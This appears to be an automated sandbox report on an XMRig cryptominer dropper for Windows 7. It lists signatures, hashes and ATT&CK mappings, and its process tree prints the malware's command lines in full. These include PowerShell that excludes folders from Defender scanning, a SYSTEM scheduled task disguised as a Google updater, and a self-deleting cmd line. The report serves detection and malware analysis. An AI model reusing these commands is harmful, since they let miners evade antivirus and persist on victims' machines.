Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1488s
  • max time network
    1803s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 31 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1188
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Gu3PdXt79NF7EJXJ.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Gu3PdXt79NF7EJXJ.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2168
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2692
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Gu3PdXt79NF7EJXJ.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2700
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2556
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:1652
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:1464
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe qtdiqnkejoz
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:1308
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          PID:2060
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:2956
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2968
      • C:\Windows\System32\choice.exe
        choice /C Y /N /D Y /T 3
        1⤵
          PID:2560
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {81E46B3C-80B2-4614-B479-C2428E29C337} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2844
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:2608

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          599KB

          MD5

          db9199b8f6bdae365cbe0ed9c8ffa83a

          SHA1

          df4efeb1afd347268d48c3fbb1c6af2ba4fdbaf4

          SHA256

          a922ed60a03c51f3a1b712bd6967c47da07c52fa55b090959f71677f2f742028

          SHA512

          2a5570e16976d12d297c1d4ba7eb3c385890621228e0b9ed9539e2a258dd5eaea94fd314ceb31ad8c348773ce4506f989219faacd0bafb1f755b4db15256faea

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          296KB

          MD5

          0548919fa7811beeadfae4a5627dfa3a

          SHA1

          526b7d7e7e702a8447268312aeaebdcd9dda4a71

          SHA256

          cb4c1cc9a6dfc999982efe6a9f3543fa9b977fefb58dcec0de7f371833ff66fa

          SHA512

          b7460a0977a0e2cb9cb3a2eadeb36e302a0d1a3a3fbe4ce455b9dfb4fb2d94ef79025d6849c01ed24a04919c9745057aeee83b50887774098ed7030f080e1d30

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UK2R2S1D5KOFMX6I6O5A.temp
          Filesize

          7KB

          MD5

          104e930cf0d8451fe5ae244a33c40f2b

          SHA1

          3a5908a1ddef0e8a7a1f11607e62fb75ede1bbf4

          SHA256

          3b29adf81af476bf40e52fbb0334705a825682e6dc526a40d89c265f5e28b5a3

          SHA512

          9972d8ae3d387d1e9c4baa7ce937769e19dbb08c936ddb7ecaacaf0cbec79d1457a91257c0a505229d0d9caf00e0c29942888af574a2fb8eed098faafa8d4d42

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          744KB

          MD5

          387e1bd621ef1f01d88461d66bf08729

          SHA1

          58df79428c66407cee9b6cd88563a1330bf86616

          SHA256

          9051a6fb22f54bdeecb0f7d3dfc0ade4eefbed957d90c9c9c90cb85c82899c45

          SHA512

          22f491a4a750476678477caa6a9622a1fe9a1ddadebc4ab85a1be6126a42e16ca36ef38f93f0a684ad76757b2c1106bfdfcd2234a93ba3c85ecf49d506c0493e

        • memory/1308-71-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1308-75-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1800-50-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
          Filesize

          9.6MB

        • memory/1800-49-0x00000000001C0000-0x0000000000240000-memory.dmp
          Filesize

          512KB

        • memory/1800-48-0x00000000001C0000-0x0000000000240000-memory.dmp
          Filesize

          512KB

        • memory/1800-51-0x00000000001C0000-0x0000000000240000-memory.dmp
          Filesize

          512KB

        • memory/1800-47-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
          Filesize

          9.6MB

        • memory/1800-52-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
          Filesize

          9.6MB

        • memory/1992-0-0x000000013F060000-0x000000013F271000-memory.dmp
          Filesize

          2.1MB

        • memory/1992-29-0x000000013F060000-0x000000013F271000-memory.dmp
          Filesize

          2.1MB

        • memory/2168-23-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
          Filesize

          9.6MB

        • memory/2168-22-0x0000000002690000-0x0000000002710000-memory.dmp
          Filesize

          512KB

        • memory/2168-26-0x0000000002690000-0x0000000002710000-memory.dmp
          Filesize

          512KB

        • memory/2168-25-0x0000000002690000-0x0000000002710000-memory.dmp
          Filesize

          512KB

        • memory/2168-20-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
          Filesize

          9.6MB

        • memory/2168-21-0x0000000001F80000-0x0000000001F88000-memory.dmp
          Filesize

          32KB

        • memory/2168-24-0x0000000002690000-0x0000000002710000-memory.dmp
          Filesize

          512KB

        • memory/2168-27-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
          Filesize

          9.6MB

        • memory/2168-19-0x000000001B0C0000-0x000000001B3A2000-memory.dmp
          Filesize

          2.9MB

        • memory/2556-41-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp
          Filesize

          9.6MB

        • memory/2556-36-0x0000000002760000-0x00000000027E0000-memory.dmp
          Filesize

          512KB

        • memory/2556-37-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp
          Filesize

          9.6MB

        • memory/2556-39-0x0000000002760000-0x00000000027E0000-memory.dmp
          Filesize

          512KB

        • memory/2556-35-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp
          Filesize

          9.6MB

        • memory/2556-40-0x0000000002760000-0x00000000027E0000-memory.dmp
          Filesize

          512KB

        • memory/2556-38-0x0000000002760000-0x00000000027E0000-memory.dmp
          Filesize

          512KB

        • memory/2696-13-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp
          Filesize

          9.6MB

        • memory/2696-7-0x0000000002600000-0x0000000002680000-memory.dmp
          Filesize

          512KB

        • memory/2696-8-0x0000000002260000-0x0000000002268000-memory.dmp
          Filesize

          32KB

        • memory/2696-5-0x000000001B0F0000-0x000000001B3D2000-memory.dmp
          Filesize

          2.9MB

        • memory/2696-6-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp
          Filesize

          9.6MB

        • memory/2696-12-0x0000000002600000-0x0000000002680000-memory.dmp
          Filesize

          512KB

        • memory/2696-10-0x0000000002600000-0x0000000002680000-memory.dmp
          Filesize

          512KB

        • memory/2696-11-0x0000000002600000-0x0000000002680000-memory.dmp
          Filesize

          512KB

        • memory/2696-9-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp
          Filesize

          9.6MB

        • memory/2704-57-0x00000000010B0000-0x0000000001130000-memory.dmp
          Filesize

          512KB

        • memory/2704-54-0x00000000010B0000-0x0000000001130000-memory.dmp
          Filesize

          512KB

        • memory/2704-58-0x00000000010B0000-0x0000000001130000-memory.dmp
          Filesize

          512KB

        • memory/2704-59-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp
          Filesize

          9.6MB

        • memory/2704-55-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp
          Filesize

          9.6MB

        • memory/2704-53-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp
          Filesize

          9.6MB

        • memory/2704-56-0x00000000010B0000-0x0000000001130000-memory.dmp
          Filesize

          512KB

        • memory/2844-66-0x000000013F200000-0x000000013F411000-memory.dmp
          Filesize

          2.1MB

        • memory/2844-45-0x000000013F200000-0x000000013F411000-memory.dmp
          Filesize

          2.1MB

        • memory/2968-89-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-100-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-69-0x0000000000270000-0x0000000000290000-memory.dmp
          Filesize

          128KB

        • memory/2968-72-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-74-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-68-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-77-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-76-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-78-0x0000000000270000-0x0000000000290000-memory.dmp
          Filesize

          128KB

        • memory/2968-81-0x0000000000290000-0x00000000002B0000-memory.dmp
          Filesize

          128KB

        • memory/2968-80-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-83-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-85-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-87-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-67-0x00000000000B0000-0x00000000000D0000-memory.dmp
          Filesize

          128KB

        • memory/2968-91-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-98-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-70-0x0000000000290000-0x00000000002B0000-memory.dmp
          Filesize

          128KB

        • memory/2968-102-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-104-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-106-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-108-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-110-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-114-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-116-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-118-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-120-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-122-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-124-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-126-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-128-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-130-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-132-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-134-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2968-136-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB